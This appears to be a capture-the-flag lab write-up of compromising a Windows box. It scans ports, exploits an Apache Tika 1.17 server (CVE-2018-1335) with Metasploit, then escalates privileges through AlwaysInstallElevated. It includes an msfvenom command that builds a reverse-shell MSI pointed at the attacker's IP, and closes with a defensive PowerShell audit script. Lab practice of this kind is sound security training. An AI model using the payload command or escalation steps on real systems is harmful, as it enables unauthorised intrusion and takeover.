Before all
I haven’t posted any pentesting write up recently.
It means that I have hardly trained my penetration testing skills recently (but have been preparing for school exams and reversing LOL), so it's time to practice ~
Victim’s IP : 10.10.231.218
Victim’s Host : cyberlens.thm
Attacker’s IP : 10.9.195.189
Write up
RECON
port scan
command
rustscan -a 10.10.231.218 --ulimit 5000 -- -sC -sV -Pn
Found an interesting service on port 61777 (Apache Tika 1.17 Server).
Exploit
CVE-2018-1335
Exploiting Tika 1.17 server
After a quick search on exploit-db, I tried this exploit in msfconsole and gained a user shell.
Privilege Escalation
Exploiting AlwaysInstallElevated
I used the PrivescCheck.ps1 script to check for PE vectors on this machine.
The AlwaysInstallElevated setting allows users to install an MSI file with admin privileges, and the installed package also runs with those privileges.
So, just generate a malicious MSI file with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.195.189 LPORT=9003 -a x64 --platform Windows -f msi -o evil.msi
Grab it with the victim's machine and run it ~
Aha !
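On the defensive side, the AlwaysInstallElevated finding above can be audited across a host with a few lines of PowerShell. This is an added example, not part of the original write-up or of PrivescCheck; the function name Get-AieValue and the report column names are hypothetical. It relies on the policy only taking effect when the value is 1 in both the machine hive and a user hive.

```powershell
# Added example: audit the AlwaysInstallElevated policy for every loaded user hive.
# The policy is effective only when the DWORD is 1 under BOTH HKLM and the user's hive.
$subKey = 'Software\Policies\Microsoft\Windows\Installer'
$name   = 'AlwaysInstallElevated'

function Get-AieValue {   # hypothetical helper name
    param([string]$Path)
    # Returns the DWORD value, or $null when the key or the value is absent.
    $item = Get-ItemProperty -Path $Path -Name $name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return $item.$name }
    return $null
}

$machine = Get-AieValue "HKLM:\$subKey"

# Walk HKEY_USERS so that accounts other than the current one are covered too.
# Reading other users' hives needs an elevated session; *_Classes hives are skipped.
$report = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
    ForEach-Object {
        $user = Get-AieValue "Registry::HKEY_USERS\$($_.PSChildName)\$subKey"
        [pscustomobject]@{
            Sid          = $_.PSChildName
            MachineValue = $machine
            UserValue    = $user
            Effective    = ($machine -eq 1 -and $user -eq 1)
        }
    }

$report | Format-Table -AutoSize

if ($report | Where-Object { $_.Effective }) {
    Write-Warning 'AlwaysInstallElevated is active: any MSI these users start installs elevated.'
    # Local fix (a domain GPO will re-apply the value until the policy itself is disabled):
    # Remove-ItemProperty -Path "HKLM:\$subKey" -Name $name
} elseif ($machine -eq 1) {
    Write-Warning 'Machine value is 1; the policy becomes active for any user whose hive also sets it.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled in the machine hive.'
}
```

If the value comes from Group Policy, disable "Always install with elevated privileges" under Windows Components > Windows Installer in both the Computer and User Configuration trees instead of editing the registry by hand.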
After all
My first pentesting on my New Ubuntu VM >w<